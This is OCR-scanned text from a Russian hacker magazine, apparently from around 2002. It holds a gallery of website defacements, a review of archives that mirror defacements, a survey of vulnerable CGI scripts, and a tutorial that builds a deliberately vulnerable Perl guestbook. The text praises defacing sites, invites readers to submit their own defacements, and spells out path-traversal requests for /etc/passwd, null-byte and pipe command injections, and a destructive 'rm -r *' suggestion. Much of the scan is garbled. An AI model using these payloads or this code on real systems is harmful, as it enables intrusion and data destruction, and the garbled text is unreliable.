заслужила право на тотальное доминирование в обзоре самых оригиналь- 
ных дефейсов :). Если ты не очень ладишь с фиглишем, перевожу: «Говорят, 
что если посадить бесконечное множество обезьян за клаву и позволить им 
бесконечно долго долбать по клавишам, рано или поздно они повторят тру- 
ды Шекспира. Но почему-то забывают упомянуть, что в то же время около 
пятидесяти из обезьян сделают свой первый дефейс. Добро пожаловать в 
мой мир. EVIL ANGELICA - WEB-OBE3bAHA. Хакинг за бананы». 


Рис. 4. Дефейснут: www.txnd.uscourts.gov Дефейснул: Hi-Tech Hate) 
B4dBOy и naDrol из группы Hi-Tech Hate хакнул сайт и посвятили этот дефейс 
своим любимым девушкам. B4dBOy в честь некой Симоны даже написал на весь 
инет: помни - Я БУДУ ЛЮБИТЬ ТЕБЯ ВСЕГДА. А интересно в этом дефейсе то, что 
он интерактивный: если навести мыша на картинку Hi-Tech Hate, весь сайт на- 
чинает сотрясаться, как во время землетрясения (JavaScript). Очень прикольно 
смотрится, чувствуется некая мощь. 


Рис. 5. Дефейснут: www.fwb.tasc.com Дефейснул: 
Crookies) 
Команда Crookies задефейсила www.fwb.tasc.com, чтоб позд- 
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равить с днем варенья некого EvilByte а (еще один нашумевший дефейсер 
— мы сним еще повстречаемся). Очень трогательно :)! 


Рис. 6. Дефейснут: msrconf.microsoft.com/CMT/fledeiicuyn: flipz (судя 
по всему) ) 
Save the world. Kill Bill. Спасите мир - убейте Билла :)))))). 


Рис. 7.Дефейснут: magazine.gunstick.dk Дефейснул: NetCat from 
DarkCode) 

A BOT и, наконец, дефейс, который можно разбирать (это самое интересное, 
когда изучаешь дефейсы ;)). Смотри: «Netcat was Here» — означает, что 
сайт взломал Netcat. Чуть ниже то же самое, только с упоминание группы, 
в которой состоит этот самый Netcat — DarkCode. Далее идут «Greetz» и мы- 
ло - для связи. Короче, все очень просто и не так уж запутано. Дальше я не 
буду все так подробно расписывать и разбирать - разбирайся сам, при- 
ятель ;), ты ж не ламо какое-нибудь, в конце концов... Я буду просто при- 
водить небольшие комментарии, если это ребуется. Смотри и наслаждайся. 


Puc. 8. Дефейснут: ns2.rentaweb.co.za Дефейснул: EhW) 
Прикольный дефейс, в оформлении которого заюзан А$СП-арт. 


Рис. 9. Дефейснут: www.acidmoon.com/mirror.html) 
Супер, чел заморочился с 30!!! 


Рис. 10. Дефейснут: www.boz.zm/mirror.html Дефейснул: Wuz) 
Еще один ASCII. Обрати внимание - взломан национальный банк Зимбабве! 


Рис. 11. Дефейснут: www.britishcouncil.org.tr Дефейснул: EvilByte) 
Красиво. Сделал тот самый EvilByte, которого чуть выше поздравляли :). 


Рис. 12. Дефейснут: www.jabberme.com Дефейснул: SynchrOnize of 
woot project 


Рис. 13.Дефейснут: www.rondomagazin.de 
Дефейснул: EhW 


Рис. 14.Дефейснут: www.tecs.com.br 
Дефейснул: Digital Wrapperz 


Puc. 15.Дефейснут: www.mastersel.com.br 
Мазафака! За что так мой любимый линукс!!?? Все-таки, все дефейсеры — 
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в своем роде сволочи (а вот этого не надо :)! — прим. ред.)! Ну ладно, BSD я тоже люблю.... 


Рис. 16. Дефейснут: www.arbour-ridge.bc.ca 
Дефейснул: TeckLife 


Рис. 17. Дефейснут: www.clubzonecentral.com 
Дефейснул: Oxff Team 


Люблю дефейсы, смотреть Ha которые и полезно и приятно :). 
Рис. 18. Дефейснут: www.infogym.com 
Дефейснул: Нах0г$ Lab 


Рис. 19. Дефейснут: mongbat.helsinki.fi 
Дефейснул: Hacker Squad 


A этот чувак, видимо, очень долго пытался задефейсить какой-то очень секюрный сайт. Замари- 


новался.... 


Взаляй на Silent Stonm изнутри, 
Cyreppenopmax o camod 
nepcnenmuEeHod поцлаесвой 
стратезыи от самого 
продвинутого разработчика уз 
России — компании Ма 


Эксклюзивный репортаж из первых рук: 
Unreal Tornament 2003. 


За секунду до выхода 3D-action’a — 
игры года 


Новости от Nvidia, тест сканеров, 
USE Multimedia Keyboard 9000АЦ 
все под контролем 

Как запустить старые игруишки год 
Windows ХР. 


Новости, preview, review, советы 

по прахождению игр, Loading, топ 
20, { 
Игровой 


ЗАЗЕРНАПЬЕ 
B3SNnomoB 


обзор сайтов с мирорами дефейсов 


Андрей Каролик (andrusha@sl.ru) 


www.xakep.ru 


А начнем мы наш обзор с всенародно любимого сайта хакер.ру. И He просто 
по той причине, что это мега-кул и форева, - тут и мироры дефейсов есть :). 
Чтобы до них добраться, иди в раздел B3nom/Deface, теперь ты на месте. Все 
предельно лаконично и информативно - число, адрес хакнутого сайта и не- 
посредственно ссылка на зеркало взлома. К минусам можно отнести отсут- 
ствие дополнительных сведений о дефейсах - нет ни комментов, ни даже 
имен злобных исполнителей. Обновляется раздел регулярно, по 5-10 (тутуж 
от хацкеров зависит :)) новых взломов в сутки, перерывов больше чем на 
два дня (всем нужен отдых!) замечено не было. К сожалению, нет статисти- 
ки по общему количеству дефейсов на сайте, а самостоятельно пересчиты- 
вать я поленился. Не хватает, имхо, фичи поиска, чтобы выводить инфу о по- 
хаченных сайтах за конкретный промежуток времени. Но тут уж все и от вас 
зависит, захотите подобных удобств - требуйте у редакции сайта, глядишь и 
сделают :). Понравился мне девиз раздела Deface: «Взломал - покажи наро- 
ду!». Так что, если задефейсишь вражеский сайт, смело шли свою работу по 
адресу xa@real.xakep.ru - о твоих подвигах узнает вся Россия :). Теперь не- 
сколько выводов относительно сайта. Раздел Вегасе Ha хакер.ру - это раз- 
дел новостной, поэтому главная его задача - просто дать посетителям инфу 
о взломах, конкретно и без рассусоливаний. А уж если дефейс тебя интере- 
сует в подробностях - добро пожаловать на следующие ресурсы. 


www.void.ru 


Зайдя Ha этот сайт и кликнув своим мышастым другом по разделу с забав- 
ным названием «Трофеи и Чучела», я попал в... в лучшее Рунетовское хра- 
нилище мироров взломов. Вот тут все уже поставлено на более професси- 
ональном уровне. Кроме обязательных пунктов - дата, урл сайта, зеркало 
взлома - на Void’e присутствует инфа о том, кто замутил дефейс, какой сер- 
Bak подвергся унижению (IIS, Apache etc.) и какая на нем установлена ось 
(на серваке, не на хацкере :)). Все замечательно, только с последним пунк- 
том облом - всюду стоит Unknown (а может это новая ось такая ;)), хотя со- 
здатели сайта утверждают, что версия OC определяется стандартным мето- 
дом птар. Обновления выкладываются по мере поступления, количество 
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тем, что есть кул и что есть нет. 


дефейсов в сутки значительно варьируется - от одного до двадцати и даже 
больше. Очень порадовало то, что я не заметил и пустых дней - \/ОТО’овцы 
работают, не отвлекаясь на всякие там weekend’bi и ПоНдауз`ы :). Впечатля- 
юще выглядит общее количество архива «чучел» - 5545 штук, это вам не 
шутки. На сайте выложены дефейсы, сделанные начиная с 2000 года. Что- 
бы не заблудиться в зеркальных залежах и найти правильный путь, созда- 
тели раздела любезно предоставили на всеобщее юзанье функию просмо- 
тра архива за требуемый временной интервал. Я, по простоте душевной, 
решил окинуть все взломы разом, и настойчиво попросил показать мне ВСЕ 
в одном окошке - мой браузер печально взглянул на меня и повис. He | 
вторяй моих ошибок :). В общем и целом, сайт отменный. Для тех, 
рьез интересуется дефейсами, но забугорные сайты не посещает по г 


taxidermia.void.ru 


Еще один русский сайт с зеркалами дефейсов (правда, весь на аглицком). 
Очень даже неплохой на первый взгляд. Замечательное оформление, дизай- 
нерские находки. На главной страницы мы видим таблицу: дата, зеркало де- 
фейса сайта, автор, ОС сервера, http-daemon. Только в колонке OC всюду 
стоит Анкноун (как и на самом Войде), а имен хацкеров нет вообще. Слева 
я заметил менюшку с полезными разделами: Поиск, Зал Стыда, Статистика по 
захватчикам, осям, серверам и доменам. Ух ты, вот это рулез однозначный - 
подумал я и попытался зайти в какой-нибудь дополнительный раздел. 06- 
лом - везде я попадал на одну и Ty же страницу - главную. Спустя неделю по- 
пытку я повторил - результат тот же, ничего не работает. НО! Новые дефей- 
сы появляются каждый день, в значительных размерах - значит сайт живет 
и развивается. Я не в курсе, что там с сайтом, но надеюсь, что или не все еще 
готово (и скоро будет), или идет переработка. Хотя есть повод думать, что, 
когда ты будешь читать эту статью, Taxidermia заработает на полную мощь. И 
тогда станет этот сайт, имхо, одним из лучших складов мироров, по крайней 
мере в Рунете. Заглядывай сюда почаще - будешь в ритме :)! 


Кроме обязательных пунктов - дата, урл сайта, зеркало 
взлома - на Void’e присутствует инфа о том, кто замутил 


дефейс, какой сервак подвергся унижению (IIS, Apache etc.) и 
какая на нем установлена ось (на серваке, не на хацкере :)). 


Обойти этот сайт стороной никак нельзя. К сожалению, он уже не обновля- 
ется, так как его создатели не в силах оказались заниматься размещением 
дефейсов, которые увеличивались с фантастической скоростью. Но 
Attrition’s team были одними из первых, создавшими подобный ресурс. По- 
верь, посетить это место нужно в обязательном порядке. В архиве сайта 
свыше 20000 зеркал взломов. К дефейсам даны комменты: какая ось на сер- 
вере, какой айпишник у хакнутого сайта, дополнительная инфа по взлому, 


Зазеркалье взломов 
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авторы хака. Сразу бросается в глаза оформление сайта - видно, что не 2002 
год - отвыкли мы уже от такого немного. Черный фон, белый текст и ярко 
красные ссылки - зато заметишь все, что требуется. Не реализован поиск, 
что делает копание в архиве немного напряжным: сразу куда надо не зай- 
дешь, придется клацать back ог forward. На Attrition’e достаточ- 
но много статистических данных по дефейсам, причем статис- 
тика попадается очень полезная - например, сколько раз был 
поставлен на колени сайт NASA :). Присутствуют и другие све- 
дения по взломам: различные статьи, разъяснения и тому по- 


добное. В общем, серьезный подход к теме налицо. Но, повторяю, все пор- 
тит то, что сам сайт приказал долго жить. Вся накопленная инфа осталась на 
Attrition’e, но будущего у этого проекта нет. Хотя, видел я где-то в пучине не- 
та инфу о том, что собирается новая банда для возвращения сайта в геа|- 
life. Но слухами земля полнится, не стоит верить всему. А вывод будет таким 
- за свежими дефейсами на Attrition заходить бесполезно, но получить до- 
полнительную инфу по взломам, покопаться в обширном архиве мироров, 
поюзать статистические данные ты можешь. И уже это здорово. 


Парни из Safemode в свое время поняли, что потребность в стуктури- 
рованном архиве дефейсов существует, на одном Attrition’e далеко не 
уедешь. И забацали они довольно неплохой на тот период проект. Но 
на голом энтузиазме далеко не уедешь, да и злобных дефейсеров ока- 
залось значительно больше, чем авторы сайта могли себе представить. 
В начале 2002 года Safemode’s team официально объявили о прекра- 
щении поступления новых мироров, не выдержали напора. Спасибо, 
хоть накопленное сохранили :). Дизайном на этом месте и не пахнет 
(если только на главной паге), а это отпугнет многих любителей графи- 
ческих изысков. Но мне важнее контент - а с ним все в порядке. База 
на сайте осталась, база достаточно неплохая: зеркала взломов с марта 
2000 по январь 2002 года. Теперь о недостатках - их тут тьма тьмущая. 
Кроме ссылок на разбитые по датам мироры дефейсов ты не найдешь 
ничего. Не, ну где-то занычена инфа по нескольким хаксорским коман- 
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дам, но He больше. Никаких дополнительных сведений, полное отсут- 
ствие даже необходимой статистики (о общем кол-ве взломов, напри- 
мер). Если это прокатывало раньше, то сейчас вряд ли кого заинтере- 
сует Safemode. Зато на сайте нас предупреждают, что все выложенные 
мироры защищены авторскими правами. Забавно, кого подобные мес- 
саги останавливают :)? Вывод будет суровым. Safemode представляет 
собой ценность лишь в историческом плане, мол, был такой, рулил и 
потом умер. А для поиска прикольных дефейсов сюда идти не стоит, 
уж слишком все примитивно - за окном 21-й век как никак. 


Этот сайт является скорее не архивом дефейсов, а местом, где можно 
найти ТОЛЬКО самые громкие взломы. Всего 57 мироров (с 96 по 99 
годы), но они того стоят :). Действительно, веселое место. Самое руль- 
ное, что ко многим хакам прилагается небольшой дескрипшн, выпол- 
ненный с чувством юмора. А какие тут сайты фигурируют в списке 
жертв: NASA, CIA, USArmy, Pentagon etc! Это тебе He пупкинскую хоум- 
nary дефейсить :). Обновления отсутствуют, нет статистики, поиска - 
все умещается на одной странице. Но минусом это не является, де- 
фейсы на Onething.com и без того замечательны. Автор проекта за- 
явил, что будет выкладывать стоящие мироры взломов по мере по- 
ступления - ас 1999 года уж точно были взломы, вызвавшие много 
шумихи вокруг них. Но то ли владелец забил на сайт, то ли что-то еще 
- туман неизвестности пока не рассеялся. Теперь чуть в сторону - зна- 
ете почему в 99 году задефейсили сайт Моники Левински? Нефиг бы- 
ло кричать на всю страну, что президентская жена сама не могла сде- 
лать ЭТО Клинтону :). Так что, кто дефейсом проникнулся недавно и не 
в курсе скандальных хаков, welcome на onething.com. Практически то 
же самое ты найдешь по адресу www.smarthack.com. Мироров там бу- 
дет чуток поменьше, но дизайн на порядок лучше. Заходи, посвящай- 
ся, восхищайся и вперед дальше. 


Archive of Hacked Websites 


Есть в сети архивы, на которых выложены дефейсы сайтов лишь какой- 
то конкретной страны с конкретным доменом. Конечно, на серьезный 
склад зеркал эти творения не претендуют, но интерес из себя представ- 
ляют. Ведь гораздо удобнее, если ищешь дефейс сайта нужной страны, 
зайти на ресурс, где находятся взломы только требуемого домена, а не 
блуждать в лабиринтах огромных архивов. Для примера рассмотрим 
defaced.syners.org. Здесь лежат и ждут просмотра исключительно миро- 
ры хаков португальских сайтов с доменом .pt. Почему я выбрал именно 
Syners? Просто ребята показались мне наиболее перспективными. На 
сайте уже выдается инфа по названию операционки на ломаемых сер- 
ваках, усиленно готовится статистический раздел, дополнительные ма- 
териалы по дефейсу. Сами мироры представлены с ноября 2001 по июль 
2002 года. Значит, сайт молодой и только-только набирает обороты. 06- 
щее количество дефейсов маловато (не считал), но ведь сайты с доме- 
HOM .рёи не столь широко распространены, да и вообще мало их :). Ca- 


Теперь чуть в сторону - знаете почему в 99 году 
задефейсили сайт Моники Левински? Нефиг было кричать 


на всю страну, что президентская жена сама не могла 
сделать ЭТО Клинтону :). 


мо собой, обновления выходят помесячно, а не ежедневно (по крайней 
мере, пока). Велика вероятность и того, что рано или не очень рано на 
Syners’e появятся разделы с дефейсами сайтов и других доменов. Но для 
этого нужны люди, разработчик проекта трудится в основном единолич- 
но. Так что, при желании, можешь замазаться и стать практически фаун- 
дером (одним из) defaced.syners.org. А всем остальным настоятельно 
рекомендую записать адрес этого сайта и зайти туда месяцев так через 
шесть, уверен, изменений будет много и все в лучшую сторону. 


www.interrorem.com 


Забрел я Ha этот сайт довольно случайно и тут же обратил внимание Ha 
раздел Defacements. Ништяк, это то, что нам как раз и надо. Зашел и уви- 
дел мессагу - за сегодняшний день у нас четыре дефейса. Чуть ниже бы- 
ла табличка с этими самыми дефейсами. Инфа дается следующая - что 
ломали, кто ломал, на какой оси и на каком Нр-демоненке (достаточно 
подробное описание) и, наконец, само зеркало взлома. Заценив дизай- 
нерские творения хакеров, я обратил внимание на табличку вверху паги 
- в ней краткая статистическая информация по осям и веб-серверам, 
сайты на которых и дефейсили. Молодцы, дело похвальное. Присутству- 
ет две функции поиска - по заданному сайту и по точной дате. Послед- 
нее мне не совсем понравилось - выбирать можно только по конкретно- 


му числу конкретного месяца и конкретного года. То есть, если хочешь 
заценить дефейсы за прошедший месяц, по очереди вбивай каждое его 
число - только так. А потом я и вовсе расстроился - в менюхе поиска сто- 
ит только 2001 год. Как же так? Ведь и сам сайт, в целом, обновляется и 
сейчас, и на входе в раздел мне заценили свежие взломы. Забыли 2002 
год вставить или попросту перепутали 01 и 02? Не знаю - админам я от- 
писал, но ответа так и не получил. Надеюсь, что к моменту выхода этого 
Cneua баг Ha Interrorem’e пофиксят, и все встанет на круги своя. К мину- 
сам можно также отнести отсутствие инфы об общем количестве дефей- 
сов, наличие пустых дней, когда дефейсов вовсе нет. В целом - очень не- 
плохо, но нужна срочная доработка, а то какие же из владельцев специ- 
алисты в сетевой безопасности, как они себя гордо именуют :)?. 


Зазеркалье взломов 


По усредненным подсчетам - это примерно по 20 мироров 
за день. Само собой, обновления ежедневны, без 


перерывов и впечатляющи в своих количествах. Нашел я на 
сайте веселый график о численности дефейсов с января 98 
по июль 02 (включительно). 


defaced.alldas.org 


Внимание, дамы и господа! Вашему вниманию представляется ЛУЧШЕЕ Bo 
всем огромном инете хранилище дефейсов (аплодисменты, плавно пере- 
ходящие в овации). Сайт начинал работу в качестве преемника знамени- 
тых Safemode.org и attrition.org и теперь поднялся на недосягаемую высо- 
Ту - конкурентоспособных аналогов пока не существует. Инфа по взломам 
дается в подробнейшем порядке - дата, адрес взломанного сайта, мирор 
дефейса, автор хака, сервачная ось, комменты (если есть), результаты 
птар. Кроме и больше того, любому желающему и нежелающему доступ- 
ны разделы статистики на любой вкус. Хочешь узнать, какие домены боль- 
ше всего ломают - жми TLD Statistics; хочешь выяснить, кто и что дефей- 
сил - тебе на Attacker Statistics; если интересуешься, какие серваковые 
операционки становятся жертвами злоумышленников - заходи на 05 
Statistics. Мне, по крайней мере, было очень любопытно узнать, что руне- 
товские сайты составили всего лишь 0,6% всех дефейсов в архиве (для 
сравнения - .com - 30%). Ах да, я ж еще не сказал про общее количество 
хранящихся на Alldas’e взломов. Поглубже вдохните - 33912 штук, начиная 
с января 1998 года. По усредненным подсчетам - это примерно по 20 ми- 
роров за день. Само собой, обновления ежедневны, без перерывов и впе- 
чатляющи в своих количествах. Нашел я на сайте веселый график о чис- 
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ленности дефейсов с января 98 по июль 02 (включительно). Пик взломов 
пришелся на июнь прошлого года (дело было вечером, делать было нече- 
го :)) - 3500! Присутствует и функция поиска зеркал взломов - как по да- 
те, так и по адресу сайта. На сайте куча дополнительной и вспомогатель- 
ной инфы, например Defacer-FAQ, но обо всем не могу поведать, место уси- 
ленно поджимает :). Обобщая все вышеизложенное, скажу лишь - Alldas 
есть всем рулезам рулез. Обязательно внесите адрес этого замечательно- 
го ресурса в букмарки браузера! Spez рекомендует! 


ТЕПЕРЬ ПОДВЕДЕМ ИТОГИ 


В номинации лучший Рунетовский ресурс 
на тему побеждает www.void.ru. Ho 
буквально в спину ему дышит сайт taxider- 
mia.void.ru, еще немного усилий и ребята 
вырвутся на лидирующую позицию. 
Лучшим мировым складом дефейсов 
объявляется defased.alldas.org. Реальных 
конкурентов у этого сайта пока нет, но 
дело лишь за временем. 

Приз за интересность забирает 
www.onething.com/archive. Самое 
отборное, самое знаменитое, но в очень 
малом количестве. 
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БАЖНЫН СС! 


ои быстро 


Дырявые СС! шки - это то место, через которое 
делается 99% всех дефейсов. Админ может 
обнастроиться со своим файрволом до состояния, 
близкого к оргазму, закрыть все ненужные порты, 
зарезать все протоколы, кроме HTTP (иначе web- 
сервак не будет ны ‚ обставиться №05 
(Network Intrusion Detection System) и загеморроиться 
черт знает как еще, HO стоит ему положить в /Cgi-bin 
хотя бы одну дырявую С@!шку, и вся его работа 
полетит коту под хвост. 


uUcp (uucp@xakep. ru) 


A утром, явившись со страшного бодуна Ha работу (да, админы они такие ;)), 
он увидит какую-нибудь «Owned by Нах0г. Fuck you!». И хорошо, что я не 
админ какого-нибудь вэб-сервера, потому что я не знаю нормального реше- 
ния этой проблемы... 

Писать все cgi самому? Чревато большим количеством дыр и перспективой 
«Owned by...», так как чтоб писать безопасные с91-скрипты, надо занимать- 
ся этим постоянно. Нельзя просто так прийти, разобраться с Perl, сказать «Я 
крутой админ!» и начать писать секюрный С6Т` шки. Их могут писать только 
профессиональные Perl-kogeppl. 

Юзать cgi, написанный профессиональными Рег(-кодерами? Хех, тоже чре- 
Bato. Когда в такой Cgi находится хоть одна ошибка, об этом немедленно уз- 
нает весь инет, и все вэб-серваки, на которых он заюзан, послушно раздви- 
гают ноги. Когда пишешь cgi сам, есть хоть шанс отвадить тех, кто менее 
грамотен, чем ты (он просто не сможет найти твои ошибки в коде, а в ине- 
те подробного описания этих ошибок не будет, так как скрипт не распрост- 
PaHAeTCA... если ты конечто не полный идиот и не пытаешься еще и кому- 
то распространять свой, наверняка, баговый скрипт). 


Короче, засада полная! Еще раз: хорошо, что я не админ, и, что журнал наш 
называтся ] [‚ а не 4 (uUcp имеет в виду, что если бы журнал назывался «Ад- 
мин», наверняка, его название сокращалось бы до «4», так как цифра «4» в 
нашем киберпанковском мире часто заменяет букву «А» — прим. ред.). По- 
тому как в тех местах, где у админов засада, образуются широкие перспек- 
тивы для хаксоров :). Так что пускай админы чешут репы в поисках грамот- 
ного решения, а мы пока займемся изучением широко распространяемых 
с91-скриптов, в которых уже найдены ошибки. А то ведь админы - такие 
звери, что если их постоянно не держать в страхе перед «Owned by...», они 
и делать ничего не будут :). 


Но, прежде чем мы перейдем непосредственно к перечислению глюкавых 
скриптов, давай посмотрим, какие ошибки наиболее часто встречаются 
(они почти все одинаковые). 
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1. Отсутствие проверки на «../». Эта последовательность символов в юникс 
обозначает коталог, в котором находится текущий коталог. То есть роди- 
тельский (верхний) каталог для текущего. Во многих скриптах эта возмож- 
ность упускается из виду, поэтому если, допустим, скрипт позволяет прочи- 
тать какой-нибудь файл в текущей директории и не имеет проверки на 
«../», его можно, в принципе, заставить прочитать любой файл (естествен- 
но, только такой, на который у него хватает прав доступа — скрипты обла- 
дают правами доступа вэб-сервера). Если предполагалось, что запрос к 
скрипту дожен выглядеть так: 


http://www.host.com/cgi-bin/script.cgi? file=file.txt 
To можно поступить следующим образом: 
http://www.host.com/cgi-bin/script.cgi?file=../../../../etc/passwd 


То есть мы сначала поднимаемся на три уровня выше, потом опускаемся на 


один уровень в папке /etc и, наконец, читаем из нее файл passwd. 


2. Отсутствие проверки на «;» и «|». Часто позволяет запускать любые про- 
граммы (опять же, на запуск которых хватает прав). 


3. Отсутсвие проверки на нулевой символ («%00»). Иногда, если поставить 
этот символ в конец запроса дырявому CGi, он выдает требуемый файл на 
экран. 

Например, http://www.host.com/cgi-bin/script.cgi?file=/etc/passwd%00. 


А теперь поехали смотреть сами скрипты: 
everythingform.cgi 


Скрипт с удовольствием выполнит любую команду, если пред- 
ложить ему ее в виде параметра запроса, заканчивающегося на 


ОБЗОР БАЖНЫХ CGI 
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Ho, прежде чем мы перейдем непосредственно к 
перечислению глюкавых скриптов, давай посмотрим, 
какие ошибки наиболее часто встречаются. 
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«|». Нет проверки на этот символ :(. Для полного комфорта нет еще и обра- 
ботки на «../» — можно проложить дорожку к любому файлу и запустить его. 


search.cgi 

Написали этот корявый скрипт ребята из Home Free. Скрипт облегчает op- 
ганизацию поиска по сайту. Как говорится, у судьбы есть чувство юмора - 
search.cgi содержит баги, позволяющие хаксору просматривать любые 
файлы с привилегиями вэб-сервера и лазать по директориям. Вот тебе и 
облегчили поиск :). Забыли включить элементарную проверку на «../». 


netauth.cgi 

Позволяет посмотреть любой файл, просто вбухав его как параметр запро- 
са. Да еще и не имеет проверки на «../», что позволяет посмотреть дейст- 
вительно любой файл. 


handler 

Бажный скрипт, который позволяет выполнять любые команды с правами 
web-cepBepa. Хотя изначально он писался для просмотра НТМЕ-файлов. 
Проблема заключается в том, что скрипт не проверяет как следует данные, 
и, добавив к передаваемым параметрам какую-нибудь команду после точ- 
ки с запятой («;»), можно насладиться результатами ее выполнения. 


lastlines.cgi 


А этот красавец позволяет любому желающему экзекютить бинарники Cc 
правами вэб-сервера. Для этого достаточно после передаваемых парамет- 
ров добавить команду, отделенную от них символом «;». Но это еще не все: 
кодер накодил аж два бага, второй из которых позволяет произвести обхо- 
ди директории с помощью последовательности символов «../». 


faqmanager.cgi 

Выдает требуемый файл, если скормить ему нулевой символ в конце запро- 
са. Изначально предполагалось, что этот скрипт должен облегчать ведение 
всяких РОО, но теперь о переквалифицировался в fuck для админов ;). 


zml.cgi 
Покажет любой файл, если показать ему путь к файлу при помощи «../», а 
в конце прибавить еще и «%00». 


simplestmail.cgi 
Из-за отсутствия проверки Ha «;» позволяет выполнить любую команду, ес- 
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ли оформить ее как параметр и приплюсовать к ее началу эту самую «;». 


csmailto.cgi 

Вообще целый букет корявостей! Скрипт отдается даже без использования 
метасимволов! Он просто так криво написан, что комбинируя параметры, 
можно запускать любой файл, отправлять результат его работы себе на мы- 
ло, отправлять себе на мыло любой файл, ди и вообще отправлять любое 
сообщение кому угодно от кого угодно. 


webwho.pl 

Это вроде Kak web-Bepcus программы whois, но она глючит, и если ей пере- 
дать в запросе команду, отделенную пресловутой «;», она ее с охотой вы- 
полнит. 


ad.cgi 

Отсутствует проверка Ha «../» и Ha «|», в результате чего — заходи, кто хо- 
чешь, бери, что хочешь (и делай, что хочешь :)). Полный беспредел: и по 
папкам можно передвигаться и бинарники запускать — полный комплект. 


sendform.cgi 

Невинный скрипт собирает данные из НТМЕ-форм и переправляет ux Ha 
обработку другим прогам. Но вся беда в том, что в нем содержится функ- 
ция отправки файлов на мыло, которая работает коряво и готова отослать 
любой файл на любое мыло. 


gbook.cgi 

Типа гостевай книга. Отсутствует проверка Ha «;», поэтому добавив это к 
параметру запроса и организовав команду, можно заставить скрипт эту ко- 
манду выполнить. 


tigvote.cgi 
Не имеет проверки на символ «|». Результат — выполнение любых файлов 
с правами вэб-сервера. 


END.CGI 


Пожалуй хватит, a то все как-то однообразно ;). Вполне достаточно, чтоб 
представить себе, что такое дырявый сд1-скрипт. Если еще не читал, посмо- 
три статьи про стандартные дырки в рец и с-скриптах в этом номере. Там 
все подробно вплоть до мелочей. Мое же дело - показать тебе примеры ко- 
рявых скриптов, что я и сделал. Так что прощаюсь ;). Бай! 
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ПЫШЕТ БАЖНУЮ 
CGI'WHY НА PERL 


типичные дырки перловых cgi 


В то время как все админы и программеры мира 
тратят свое время и здоровье на поиск и 
исправление дырок в своих программах, мы с тобой 
займемся изготовлением этих самых дырок. Нашей 
задачей будет написать самый дырявый в мире 
скрипт на языке Perl, Потом ты этот скрипт сможешь 
подсунуть своему другу в качестве суперской 
гостевой книги и ломать его сайт каждый день ;). 
Шучу, конечно! Ты просто научишься находить дырки 
в скриптах :). Но хватит лирики, прейдем к делу. 


MOOF (moof@real.xakep.ru, http://moof.ru) 


ЧТО ПИШЕМ? 
Писать мы с тобой будем гостевую книгу. Ведь форумы и гостевые книги са- 
мые распространенные бесплатные скрипты и при этом одни из самых ды- 
рявых. К сожалению (или к счастью?), далеко не все дыры можно исполь- 
зовать для дефейса сайта. Некоторые из них позволяют отправлять е- 
та{ы с содержанием файлов или каталогов, другие позволяют удалять со- 
держимое сайта. 


СМОТРИМ! 


Самая распространенная ошибка - это ошибка, называющаяся «null-byte 
poison». Это одна из самых старых ошибок, появившаяся вместе с первыми 
операционными системами. Давай посмотрим на наш скрипт, имя файла, в 
котором хранятся все записи гостевой книги, у нас является параметром, 
который передается скрипту: 

$gbname = param(‘gbname’); 
И далее мы используем этот параметр для открытия файла с сообщениями: 

open(FILE, «$gbname.dat»); 

@DATA = <FILE>; 

close (FILE); 
С одной стороны, это хорошо: с одним скриптом мы можем создать сколько 
угодно гостевых книг, разделив их по разным темам. Но, с другой стороны, 
в этом куске кода заложена ошибка «null-byte poison». С помощью нашего 
скрипта можно получить доступ к содержимому любого файла. Естествен- 
но, если сервер даст доступ. На бесплатных хостингах, например, стоят се- 
рьезные системы разграничения доступа, и тебе никогда не получить файл 
паролей OC (какой-нибудь «/etc/passwd»). Но увидеть содержимое файла 
в каталогах пользователя легко сможешь. Все, что нам надо, это указать в 
параметре «gbname», передающегося скрипту, путь к нужному файлу: 
http://www.server.com/cgi-bin/gb.cgi?gbname=. ./WWW/index.html%00. 


#!/usr/bin/perl 

HHH 

# запуск: gb.cgi?gbname=UMA 

# ИМЯ - имя файла (UMA.dat) в котором будут 


зраниться записи 
HHH 


use CGI qw (:standard); 
use CGI::Carp qw (fatalsToBrowser); 
$| = 1; 


print «Content-type: text/html\n\n»; 


$gbname = param(‘gbname’); 
$action = param(‘action’); 
$date = param(‘date’); 


if ($action eq ‘add’) { 
&add(); 

} else { 
&show(); 


exit; 


sub show{ 
open(FILE, «$gbname.dat»); 
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В конце нашего запроса мы поставили спецсимвол с кодом 0, являющийся 
в языке программирования С символом конца строки. А поскольку боль- 
шинство OC написаны именно на С, a perl читает файлы средствами OC, то 
получается, мы заставим выполнить perl следующую команду: 
open(FILE, «../WWW/index.html»); 

в которой мы прочитаем содержимое файла index.html и выведем его Ha 
экран. Хотя сам рей и не распознает символ с кодом 0 как окончание стро- 
ки, операционная система это делает за него. Естественно, путь к файлу мо- 
жет быть другим. 


КОМАНДУЕМ! 


Следующая довольно распространенная ошибка, даже не одна, а целый на- 
бор ошибок - позволяющий выполнять команды на сервере. Вернемся к на- 
шему открытию файла. В perl командой Open можно не только открывать 
файлы, но и запускать программы на сервере. Для этого надо всего лишь 
поставить символ «|» после команды. Теперь, выполнив 
http://www.server.com/cgi-bin/gb.cgi?gbname=ts|, 
мы увидим содержимое каталога. Вместо ls можно попробовать написать 
другие итх-команды. Например, «rm -г *», которая удаляет все файлы. 
Если ты думаешь что таких ошибок нигде не встретить, то ты сильно ошиба- 
ешься. Добрая половина бесплатных скриптов, написанных за полчаса, со- 
держит подобные ошибки. Надо просто внимательно смотреть. В некото- 
рых скриптах допускаются еще более грубые ошибки, позволяющие выпол- 
нять команды. 
Строка, заключенная между обратными кавычкам (~~), передается опера- 
ционной системе для выполнения. Если скрипт не проверяет, что там пере- 
дается, то мы получаем возможность выполнить любую команду. В нашем 
скрипте мы передаем параметр $date, который необходим для вставки да- 
ты в письмо: 
print OUT «Date: « . ~/bin/$date™ . «\n»; 


@DATA = <FILE>: 

close(FILE); 

foreach (@DATA) { print $_; } 
return; 


} 


sub add{ 
$name = param(‘name’); 
$to = param(‘to’); 
$subject = param(‘subject’); 
$msg = param(‘msg’); 
$mailprog=’/usr/sbin/sendmail’; 


Е eed $to -s $subject»); 


print MAIL «$name\n$msg\n»; 
print MAIL «Date: « .~/bin/$date™ . «\n»; 
close MAIL; 


open(FILE, «>$gbname.dat»); 

print FILE «Имя: <a 
href=\»mailto:$to\»>$name</a><br>3aronoBok: 
ject<br>Coo6menue: $msg<br>»; 

close(FILE); 


print «Запись добавленна»; 
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Если в качестве параметра в $date передадим любую другую команду, то 
она выполнится. 

Функция eval() выполняет полученную строку как ре|-команду. В некото- 
рых скриптах встречается использование внешней переменной внутри 
eval. Например: 

